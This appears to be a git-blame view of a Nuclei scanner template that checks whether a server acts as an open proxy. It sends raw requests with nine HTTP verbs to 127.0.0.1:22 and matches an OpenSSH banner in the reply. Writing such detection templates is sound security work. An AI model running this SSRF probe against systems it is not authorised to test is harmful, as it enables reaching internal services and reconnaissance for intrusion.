2023-05-10 11:28:06 +00:00
|
|
|
id: ssrf-via-proxy
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: SSRF via Proxy Unsafe
|
|
|
|
author: geeknik,petergrifin
|
|
|
|
severity: unknown
|
|
|
|
reference:
|
|
|
|
- https://github.com/geeknik/the-nuclei-templates/blob/main/ssrf-by-proxy.yaml
|
|
|
|
- https://twitter.com/HusseiN98D/status/1649006265450782720
|
|
|
|
- https://twitter.com/ImoJOnDz/status/1649089777629827072
|
2023-06-03 18:56:35 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 9
|
2024-02-12 17:32:40 +00:00
|
|
|
tags: ssrf,proxy,oast,brute-force
|
2023-05-10 11:28:06 +00:00
|
|
|
|
2023-05-11 09:17:44 +00:00
|
|
|
http:
|
2023-05-10 11:28:06 +00:00
|
|
|
- payloads:
|
|
|
|
verb:
|
|
|
|
- GET
|
|
|
|
- HEAD
|
|
|
|
- POST
|
|
|
|
- PUT
|
|
|
|
- DELETE
|
|
|
|
- CONNECT
|
|
|
|
- OPTIONS
|
|
|
|
- TRACE
|
|
|
|
- PATCH
|
|
|
|
raw:
|
|
|
|
- |+
|
|
|
|
{{verb}} http://127.0.0.1:22 HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
stop-at-first-match: true
|
|
|
|
unsafe: true
|
2023-10-14 11:27:55 +00:00
|
|
|
|
2023-05-10 11:28:06 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "Protocol mismatch"
|
|
|
|
- "OpenSSH"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-02-12 18:33:19 +00:00
|
|
|
# digest: 4a0a00473045022100cb85c3694463932aef32b09741b5e20bd74bbc8a79ebefe3234f7206151e28f702207ebda8bace5a57690e562eef8097bc21b660e0bccf815dea268cc93a81af532d:922c64590222798bb761d5b6d8e72950
|